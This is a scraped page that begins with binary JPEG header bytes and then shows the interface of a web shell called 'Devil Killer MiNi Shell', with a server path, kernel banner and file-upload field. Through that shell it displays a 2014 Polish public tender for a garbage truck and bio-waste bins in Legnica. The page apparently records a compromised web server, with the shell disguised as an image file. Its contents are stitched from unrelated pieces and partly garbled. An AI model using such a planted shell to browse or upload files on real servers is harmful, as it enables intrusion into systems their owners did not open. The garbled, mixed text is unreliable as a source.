JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140129/33248-N-2014.html

<p class="kh_header"><b>Legnica: Dostawa fabrycznie nowej śmieciarki z możliwością odbioru i transportu bioodpadów wraz z pojemnikami</b><br>
<b>Numer ogłoszenia: 33248 - 2014; data zamieszczenia: 29.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Legnickie Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. , ul. Nowodworska 60, 59-220 Legnica, woj. dolnośląskie, tel. 76 8566350, faks 76 8566355.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa fabrycznie nowej śmieciarki z możliwością odbioru i transportu bioodpadów wraz z pojemnikami.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa fabrycznie nowej śmieciarki z możliwością odbioru i transportu bioodpadów wraz z pojemnikami.2.Termin wykonania zamówienia:do 5 tygodni od dnia podpisania umowy.3.Miejsce dostawy: Legnickie Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o.Zakład Oczyszczania Miasta,ul. Nowodworska 48,59-220 Legnica
4.Charakterystyka przedmiotu zamówienia-wymagania Zamawiającego:
1.ŚMIECIARKA
Parametry techniczne, użytkowe i jakościowe przedmiotu zamówienia  bezwzględnie wymagane przez Zamawiającego	
PODWOZIE
Podwozie fabrycznie nowe rok produkcji- 2013 lub 2014,Dopuszczalna masa całkowita- 26 ton,Zbiornik paliwa- min. 250 litrów z zakręcanym i zamykanym na kluczyk korkiem (ilość kluczyków- min. 3 szt.),Norma emisji spalin- EURO 5 lub EURO 6,Koła z oponami 315/80R,Tarcze kół 10 (dziesięcio) otworowe,Na osi napędowej opony szosowo- terenowe,Silnik wysokoprężny min.290 KM,Maksymalny moment obrotowy silnika- min. 1100Nm,Skrzynia biegów zautomatyzowana bez pedału sprzęgła- min. 12 biegów,Dodatkowy podgrzewany filtr paliwa z separatorem wody,Rozstaw osi między pierwszą a drugą- 3800- 4000 mm,Płomieniowe urządzenie  rozruchowe,Wydech wyprowadzony do góry,Przednie zawieszenie- resory paraboliczne- min. 7,5 ton,Stabilizator osi przedniej,Tylne zawieszenie pneumatyczne- min. 19 ton,	Oś tylnia ostatnia wleczona, kierowana i podnoszona, Blokada mechanizmu różnicowego osi tylnej,Stabilizator osi tylnej,Regulacja wysokości zawieszenia,Hamulec osi przedniej i tylnej- tarczowy,Układ hamulcowy z systemem ABS,System ASR i ESP,Hamulec silnikowy,Osuszacz powietrza podgrzewany,Hamulec przystankowy dla śmieciarki  z ograniczeniem dot.cofania wg DIN EN 1501-01,Oświetlenie zgodnie z zobowiązujacymi przepisami o ruchu drogowym, Światła do jazdy dziennej,Regulacja zasięgu świateł,Tempomat,Komputer pokładowy,Przystawka odbioru mocy odsilnikowa, niezależna od sprzegła i skrzyni biegów,Układ kierowniczy ze wspomaganiem,	Koło kierownicy z regulowaną wysokością i pochylaniem,Fabryczny immobiliser,Akumulatory 12V minimum 150AH-2 szt.,Mechaniczny wyłącznik akumulatorów,Klimatyzacja z automatyczną regulacją temperatury,	
Ogrzewanie,Centralny zamek,Elektrycznie sterowane szyby,Tachograf cyfrowy,Radio CD,	Radio RTV,Elektrycznie regulowane lusterka wsteczne zgodnie z obowiązującymi przepisami o ruchu drogowym,Pozostałe lusterka zgodnie z zobowiązującymi przepisami o ruchu drogowym,Kolor kabiny-biały ( RAL zostanie podany w dniu podpisania umowy z Wykonawcą),Ilość miejsc w kabinie-min. 3,Siedzenie kierowcy z zawieszeniem pneumatycznym,Pokrowce na wszystkie siedzenia-2 komplety,Belka sygnalizacyjna na kabinie  z logo LPGK-2 lampy obrotowe, 8 modułów LED,miejsce na naklejkę z logo LPGK,możliwość włączenia tylko LEDów lub tylko rotatorów,Kabina kierowcy wyposażona w zabezpieczenie mechaniczne przed jej opadnięciem,Kliny zabezpieczające umieszczane pod koła pojazdu- co najmniej 2 szt.,Dwa sygnały ostrzegawcze przy cofaniu-sygnał dźwiękowy, świetlna sygnalizacja cofania,Podręczny sprzęt gaśniczy (z opisem w języku polskim) odpowiedni do ilości i rodzaju transportowanych odpadów komunalnych,Trójkąt ostrzegawczy-2 szt.,Kompletny zestaw narzędzi,Przewód do pompowania kół,Gumowe dywaniki podłogowe,Osłona przeciwsłoneczna,przydymiona,Pneumatyczny sygnał ostrzegawczy,CB radio + antena wraz z okablowaniem do anteny,Apteczka pierwszej pomocy oraz pojemniki z solą fizjologiczną do przemywania oczu dla min. 4 osób,	Opis przycisków na zabudowie w języku polskim,	Wszelkie zasuwy, zawory i przełączniki oznakowane w taki sposób aby ich położenie pozwalało jednoznacznie określić, czy otwierają lub zamykają przepływ mediów,Halogeny dalekosiężne zamontowane po bokach belki syganlizacyjnej na kabinie- 2 szt.,Alkomat bez użycia ustnika,Wielkość zużycia energii- max.15 MJ/km, Wielkość emisji dwutlenku węgla- 1,1 kg/km, Wielkość emisji zanieczyszczeń:a)tlenków azotu- max. 35 g/km, b)cząstek stałych- max. 0,25 g/km, c)węglowodorów- max. 0,40 g/km	
ZABUDOWA Przystosowana do zbiórki i transportu odpadów (bioodpadów) z dużą ilością odcieków (konstrukacja uniemożliwia wyciek odcieków w czasie załadunku, transportu i postoju pojazdu),Odpowiednie uszczelnienie całej zabudowy,	
Zbiornik na odcieki- montowany pod zabudową, wyposażony w zawór kulkowy,Pojemność zbiornika na odcieki- min. 400 litrów,Pojemność skrzyni ładunkowej- min. 20 m3, Podwyższona burta przednia skrzyni ładunkowej,Zabudowa skrzyniowa z urządzeniem zasypowym tylnym,	
Skrzynia ładunkowa o przekroju prostokątnym,Powierzchnie boczne skrzyni ładunkowej-jednolite (możliwość zapełnienia jej folią reklamową), w przypadku występowania ożebrowania; zakryte na całej powierzchni blachą aluminiową o grubości nie powodującej fałdowania,Możliwość wykonania autodiagnozy sprawności układu elektrycznego przez urządzenie znajdujące się w kabinie kierowcy,	Instalacja hydrauliczna zasilana przez pompę dwustrumieniową o wydajności min. 120l/min,Krawędź zasypu położona na wysokości max. 1400mm, Zabudowa wielokrotnie gruntowana i lakierowana w barwach Zamawiającego, tj komunal Orange (RAL zostanie podany w dniu podpisania umowy z Wykonawcą),Oświetlenie zgodne z  obowiązującymi przepisami prawa typu LED: światła hamowania, postojowe oraz 2 światła alarmowe typu kogut z przodu i z tyłu pojazdu, Reflektor roboczy z tyłu zabudowy,Pasy odblaskowe (ostrzegawcze) na kabinie i odwłoku, Błotniki kół tylnych z chlapaczami,Dwa stopnie składane po bokach zasypu tylnego wraz z czujnikami (jazda do przodu przy obciążonym stopniu max. 5km/h, jazda do tyłu niemożliwa), automatyczna informacja w kabinie kierowcy o tym, który stopień  jest zajęty,Sygnał dźwiękowy i świetlny przy cofaniu się pojazdu do tyłu,Bezpieczne uchwyty do zamontowania na skrzyni zabudowy,Opis przycisków na zabudowie w języku polskim,Akcesoria do sprzątania, tj. łopaty i miotły wraz z wyposażeniem,Uchwyty na miotłę i łopaty na bocznej prawej ścianie pojazdu zabezpieczone przed samo otwarciem podczas jazdy,Zbiornik na mydło i wodę z możliwością podgrzewania wody,
Wszelkie zasuwy, zawory i przełączniki oznakowane w taki sposób aby ich położenie pozwalało jednoznacznie określić, czy otwierają lub zamykają przepływ mediów, Odwłok wyposażony w zabezpieczenie mechaniczne przed jego opadnięciem,Musi odpowiadać wytycznym 89/392 EWG i posiadać znak CE, posiadać 	Nieprogresywny System Automatycznego Smarowania o ciśnieniu roboczym w systemie minimum 100bar, z ciśnieniem wyjściowym  z pompy nie większym niż 250bar. System wyposażony w sterownik w kabinie kierowcy z diodowym panelem informującym o rezerwie smaru w zasobniku pompy i spadku ciśnienia w systemie oraz ze sterownikiem z elektronicznym zapisem pamięci akcji pracy systemu umożliwiającym diagnozę systemu. Zamawiający wymaga, aby pojazd być wyposażony w urządzenia rejestrujące oraz instrumenty pomiarowe kompatybilne z eksploatowanym u Zamawiającego systemem do zarządzania flotą pojazdów FM.frameLOGIC.
Pojazd winien być wyposażony w tablet wraz z uchwytem samochodowym posiadającym własne gniazdo przejmujące funkcję ładowania urządzenia. Poniżej wskazane zostały minimalne parametry techniczne tabletu: system operacyjny android min. 4.0, przekątna 7 cali, rozdzielczość ekranu 1024x 600, procesor 2 rdzeniowy min. 1000 MHz, pamięć RAM 1 GB, pamięć wbudowana 8 GB, odbiornik GPS, wbudowane głośniki i mikrofon, obsługa telefonu GSM, modem GSM, akumulator litowo- jonowy min. pojemność 4000mAh, czytnik kart microSD, kamera min. 3 Megapixle, WiFi 802.11 b/g/n, Bluetooth 3.0,ekran dotykowy Multi-Touch, TFT,powłoka odporna na odciski palców, 16mln kolorów. Tablet winien posiadać gwarancję na okres min. 24 miesięcy.
Wykonawca zobowiązany jest do montażu w pojeździe rejestratora  GPS podłączonego do magistrali CAN, sondy pomiaru paliwa oraz opomiarowania pracy zasypu i otwarcia odwłoka.
2.POJEMNIKI DO ZBIÓRKI ODPADÓW
A.POJEMNIKI NA ODPADY BIO
Charakterystyka przedmiotu zamówienia
Parametry techniczne, użytkowe i jakościowe przedmiotu zamówienia  bezwzględnie wymagane przez Zamawiającego
Ilość- 200 szt.,Kolor- brązowy,Pojemność-120 l,Pojemniki fabrycznie nowe- rok produkcji 2013 lub 2014,Wykonane z PE- HD (polietylen niskociśnieniowy wysokiej gęstości),Odporne na promieniowanie UV, niskie temperatury i chemikalia), Układ jezdny: stalowa ośka z 2 kołami o średnicy 200 ÷ 220mm,Klapa z dwoma bocznymi uchwytami,Przystosowane do opróżniania przez standardowe śmieciarki,Górne i dolne otwory wentylacyjne w ścianach bocznych pojemnika,Otwory wentylacyjne do odparowania cieczy w pokrywie pojemnika,Ruszt odciekowy,Trwały napis ODPADY BIO,Wykonane zgodnie z normą PN EN-  840,Atest PZH (Państwowego Zakładu Higieny).
B.POJEMNIKI NA ODPADY BIO
Charakterystyka przedmiotu zamówienia
Parametry techniczne, użytkowe i jakościowe przedmiotu zamówienia bezwzględnie wymagane przez Zamawiającego
Ilość- 150 szt.,Kolor- brązowy,Pojemność- 240 l,Pojemniki fabrycznie nowe- rok produkcji 2013 lub 2014,Wykonane z PE- HD (polietylen niskociśnieniowy wysokiej gęstości),Odporne na promieniowanie UV, niskie temperatury i chemikalia),Układ jezdny: stalowa ośka z 2 kołami o średnicy 200 ÷ 220mm,Klapa z dwoma bocznymi uchwytami,Przystosowane do opróżniania przez standardowe śmieciarki,Górne i dolne otwory wentylacyjne w ścianach bocznych pojemnika,Otwory wentylacyjne do odparowania cieczy w pokrywie pojemnika,Ruszt odciekowy,Trwały napis ODPADY BIO,Wykonane zgodnie z normą PN EN-  840,Atest PZH (Państwowego Zakładu Higieny)
3.Jeżeli w opisie przedmiotu zamówienia wskazano jakikolwiek znak towarowy, patent czy pochodzenie - należy przyjąć, że wskazane patenty, znaki towarowe, pochodzenie określają parametry techniczne, eksploatacyjne, użytkowe, co oznacza, że Zamawiający dopuszcza złożenie oferty w tej części przedmiotu zamówienia o parametrach technicznych, eksploatacyjnych i użytkowych nie gorszych niż zaproponowane przez Zamawiającego.
4.Zamawiający przedstawił minimalne parametry pojazdu i jego wyposażenia oraz pojemników, które spełniałyby założone wymagania techniczne, jakościowe oraz użytkowe. Wykonawca może zaoferować inny model towaru, ale musi on być równoważny jakościowo do określonego w SIWZ. Oznacza to, że w ofercie nie może być zaoferowany pojazd i pojemniki o niższym standardzie i gorszych parametrach niż określone w SIWZ. Wykonawca proponujący inny pojazd i pojemniki  zgodnie z art. 30 ust. 5 ustawy z dnia 29 stycznia 2004r. Prawo Zamówień Publicznych ( Dz. U. z 2013r., poz. 907 z późn. zm.) zobowiązany jest wykazać, że są równoważne jakościowo i spełniają wymagane normy, parametry i standardy. W takim przypadku zadaniem wykonawcy jest wskazanie i udowodnienie wymaganego przez Zamawiającego poziomu jakości  poprzez podanie typ pojazdu i pojemników i ich opisu zawierającego co najmniej informacje zawarte w opisie przedmiotu zamówienia.           
5. Koszty związane z dostawą przedmiotu zamówienia do siedziby Zamawiającego ponosi Wykonawca. Przekazanie przedmiotu zamówienia nastąpi w miejscu dostawy na podstawie protokołu zdawczo-odbiorczego.
6. W dniu dostawy przedmiotu zamówienia, Wykonawca winien dostarczyć odpowiednią dokumentację dotyczącą pojazdu oraz pojemników, tj.:
a) Dokumentację techniczną pojazdu w języku polskim - 1 szt.
b) Instrukcję obsługi pojazdu w języku polskim - 1 szt.
c) Książkę gwarancyjno-serwisową w języku polskim - 1 szt. (potwierdzenie oferowanej gwarancji na pojazd (podwozie i zabudowa) - min. 24 miesiące
d) Kompletną dokumentację pozwalającą na rejestrację pojazdu zgodnie z obowiązującymi przepisami prawa.
e) Certyfikaty / atesty na dostarczane pojemniki do odbioru bioodpadów.	
7.W dniu dostawy Wykonawca winien przeprowadzić całodzienne szkolenie operatorów,  mechaników i kierowców z zakresu użytkowania oraz obsługi technicznej pojazdu oraz zainstalowanych w nim urządzeń, zakończone wydaniem zaświadczenia o przeprowadzeniu szkolenia.
8. Pojazd oraz pojemniki winny spełniać normy i certyfikaty przewidziane polskim i unijnym prawem.
9. Wykonawca odpowiedzialny jest za jakość zaoferowanego przedmiotu zamówienia, zgodność wykonania zamówienia z wymaganiami określonymi przez Zamawiającego.
10. Warunki gwarancji i serwisu pojazdu:
a)minimalny okres gwarancji na pojazd (podwozie i zabudowa)- 24 miesiące. Czas obowiązywania gwarancji rozpoczyna się od dnia odbioru przedmiotu zamówienia- od podpisania protokołu zdawczo-odbiorczego i ulegnie przedłużeniu o okres napraw pojazdu w okresie gwarancyjnym.
b)bezpłatny serwis gwarancyjny przez okres 24 miesięcy ( nie obejmuje materiałów eksploatacyjnych: oleje, płyny, filtry itd. ) w siedzibie Zamawiającego, minimum 1 raz w roku. Wykonawca jest zobowiązany do podania nazwy, marki, typu, parametrów i producenta oferowanego pojazdu oraz siedziby i adresu autoryzowanego przez producenta serwisu w Książce gwarancyjno-serwisowej, 
c)zapewnienie serwisu pogwarancyjnego od zakończenia serwisu gwarancyjnego na okres min. 10 lat;
d)możliwość zgłoszenia awarii we wszystkie dni robocze w godz. 7.00-15.00,
e)czas reakcji serwisu od momentu potwierdzonego zgłoszenia awarii za pośrednictwem faksu lub poczty elektronicznej przez Zamawiającego - do 48 godzin,
f)serwis gwarancyjny oraz serwis pogwarancyjny na zasadzie serwisu stacjonarnego oraz mobilnego;
g)podczas dokonywanych napraw, przeglądów gwarancyjnych i pogwarancyjnych pracownik Zamawiającego ma prawo obserwować naprawę,
h)w przypadku zaistnienia wady/usterki pojazdu (dotyczy zarówno podwozia i zabudowy) stroną dla Zamawiającego, w celu dochodzenia roszczeń gwarancyjnych, pozostaje Wykonawca.
11. Warunki gwarancji dotyczące pojemników do odbioru bioodpadów:
Wykonawca zobowiązany jest do udzielenia 24 miesięcznej gwarancji na wszystkie pojemniki będące przedmiotem zamówienia. Bieg okresu gwarancji liczony będzie od dnia podpisania przez strony protokołu zdawczo- odbiorczego bez zastrzeżeń..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.14.45.10-6, 34.14.45.11-3, 34.92.84.80-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 35.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Warunkiem udziału w postępowaniu jest wniesienie wadium.2.Każdy wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości:9.000,00 PLN (słownie:dziewięć tysięcy złotych 00/100).3.Wadium musi być wniesione przed upływem terminu do składania ofert (dniem i godziną), określonym w punkcie XII.1.SIWZ.4.Wadium musi obejmować okres związania ofertą, tj. na okres określony w pkt. X.1. SIWZ.5.Wadium może być wnoszone w jednej lub kilku następujących formach:a) przelewem na konto Zamawiającego: BZ WBK S.A. I OLegnica, nr 87 1090 2066 0000 0005 4200 0959,b) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej,z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,c) gwarancjach bankowych,d) gwarancjach ubezpieczeniowych,e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( t.j. Dz. U.z 2007r., Nr 42, poz. 275, ze zm. ).6.Nie dopuszcza się składania wadium w innej walucie niż PLN. Zapis ten dotyczy również wadium złożonego w innej formie niż w pieniądzu.7.W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja musi być gwarancją nieodwołalną, bezwarunkową i płatną w ciągu 14 dni na pierwsze pisemne żądanie Zamawiającego, musi być wykonalna na terytorium Rzeczypospolitej Polskiej, sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:a)nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,b)określenie wierzytelności, która ma być zabezpieczona gwarancją,c)kwotę gwarancji,d)termin ważności gwarancji,e)zobowiązanie gwaranta do: zapłacenia kwoty gwarancji w ciągu 14 dni na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca:a)odmówił podpisania umowy na warunkach określonych w ofercie, lub b)zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie tego Wykonawcy,lub nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,lub w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.8.W przypadku wniesienia wadium w pieniądzu, WADIUM na koncie Zamawiającego musi znaleźć się najpóźniej do dnia składania ofert, określonego w punkcie XII.1. SIWZ, do godz. 09.00 i być oznaczone: WADIUM DO PRZETARGU TP/TO/2/2014.9.O uznaniu przez Zamawiającego, że wadium w pieniądzu wniesiono w wymaganym terminie, decyduje data i godzina wpływu środków na rachunek Zamawiającego.10.Zamawiający dokona zwrotu wadium według zasad określonych w art. 46 ustawy Pzp.
11.Przedłużenie okresu ważności wadium może nastąpić w przypadkach określonych w art. 85  ust. 4 ustawy Pzp.12.Wykonawca winien dołączyć do oferty dowód wniesienia wadium.13.Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 ustawy Pzp.14.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca: a)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, lub b)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, lub c)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, lub d)w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Wykonawca spełnia warunek, jeżeli posiada uprawnienia do wykonywania określonej działalności lub czynności, związanej z przedmiotem zamówienia (w przypadku wspólnego ubiegania się przez dwóch lub więcej Wykonawców w/w warunek może być spełniony łącznie).Ocena spełniania w/w warunku udziału w postępowaniu dokonana zostanie na podstawie złożonego oświadczenia, według zapisów punktu VII.1.1) SIWZ stanowiącego załącznik nr 3. Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o zamówienie w celu potwierdzenia spełniania warunku dotyczącego posiadania wiedzy i doświadczenia musi wykazać, że należycie wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie:a)2 (dwie) dostawy fabrycznie nowych śmieciarek,b)1 (jedną) dostawę fabrycznie nowych pojemników na odpady BIO w ilości nie mniejszej niż 300 szt. w ramach jednej umowy.(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców  w/w warunek może być spełniony łącznie).
Ocena spełnienia w/w warunku w postępowaniu dokonana zostanie na podstawie: 
złożonego oświadczenia, według zapisów punktu VII.1.1). SIWZ stanowiącego załącznik nr 3, wykazu wykonanych dostaw według Załącznika nr 7 do SIWZ, który będzie zawierał przedstawienie  wykonanych dostaw w okresie ostatnich trzech lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów, na rzecz których dostawy zostały wykonane wraz z załączonymi:dowodami, tj. poświadczeniami podmiotów, na rzecz których wykazane w załączniku dostawy  zostały wykonane określających, czy dostawy te zostały wykonane należycie, lub innymi dokumentami jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać w/w poświadczeń podmiotów na rzecz, których wykazane w załączniku dostawy zostały wykonane albo dokumentami potwierdzającymi, że dostawy zostały wykonane należycie (np. referencje).W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców  w/w warunek może być spełniony łącznie.W przypadku, gdy Wykonawca zgodnie z art. 26 ust. 2b ustawy Pzp polega na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia w szczególności przedstawić i załączyć do oferty pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Wzór pisemnego zobowiązania innych podmiotów stanowi Załącznik nr 8 do SIWZ. 
Ocena spełnienia w/w warunku dokonana zostanie zgodnie z formułą spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
